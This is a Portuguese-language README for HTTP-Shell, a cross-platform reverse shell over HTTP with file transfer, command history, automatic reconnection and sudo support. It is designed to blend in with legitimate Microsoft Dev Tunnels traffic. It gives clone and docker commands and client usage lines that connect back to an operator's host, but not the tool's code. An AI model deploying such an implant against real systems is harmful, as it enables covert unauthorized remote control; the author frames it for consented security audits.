
Shell reverso HTTP multiplataforma que fornece uma interface semelhante a um shell via HTTP, com upload/download de arquivos, histórico de comandos, reconexão automática e suporte a sudo, projetado para uso com o Microsoft Dev Tunnels.

HTTP-Shell é um Reverse Shell Multiplataforma. Esta ferramenta ajuda a obter uma interface semelhante a um shell numa conexão reversa sobre HTTP. Ao contrário de outros reverse shells, o principal objetivo da ferramenta é usá-la em conjunto com o Microsoft Dev Tunnels, para obter uma conexão o mais próxima possível de uma legítima.
Este shell não é totalmente interativo, mas exibe quaisquer erros no ecrã (tanto no Windows como no Linux), é capaz de carregar e descarregar ficheiros, tem histórico de comandos, limpeza do terminal (mesmo com CTRL+L), reconexão automática, navegação entre diretórios e suporta sudo (ou sudo su) em sistemas baseados em Linux.
Recomenda-se clonar o repositório completo ou descarregar o ficheiro zip. Pode fazê-lo executando o seguinte comando:
git clone https://github.com/JoelGMSec/HTTP-Shell
# Server
_ _ _____ _____ ____ ____ _ _ _
| | | |_ _|_ _| _ \ / ___|| |__ ___| | |
| |_| | | | | | | |_) |___\___ \| "_ \ / _ \ | |
| _ | | | | | | __/_____|__) | | | | __/ | |
|_| |_| |_| |_| |_| |____/|_| |_|\___|_|_|
---------------- by @JoelGMSec -----------------
[!] Usage: HTTP-Server.py [PORT]
# Linux CLI
[!] Usage: ./HTTP-Client.sh -c [HOST:PORT] -s [SLEEP] (optional)
# Windows CLI
[!] Usage: .\HTTP-Client.ps1 -c [HOST:PORT] -s [SLEEP] (optional)
Se pretender executar o servidor num contentor Docker:
docker build -t http-shell https://github.com/JoelGMSec/HTTP-Shell.git#main
docker run -it --rm -p 8080:8080 --name http-shell http-shell
https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels
Este projeto está licenciado sob a licença GNU 3.0 - consulte o ficheiro LICENSE para mais detalhes.
Ideia original e algum código por Héctor de Armas Padrón (@3v4si0n)
Esta ferramenta foi criada e desenhada do zero por Joel Gámez Molina (@JoelGMSec).
Este software não oferece qualquer tipo de garantia. A sua utilização é exclusiva para ambientes educacionais e/ou auditorias de segurança com o consentimento correspondente do cliente. Não me responsabilizo pelo seu uso indevido ou por qualquer possível dano causado pelo mesmo.
Para mais informações, pode encontrar-me no Twitter como @JoelGMSec e no meu blog darkbyte.net.
Pode apoiar o meu trabalho comprando-me um café: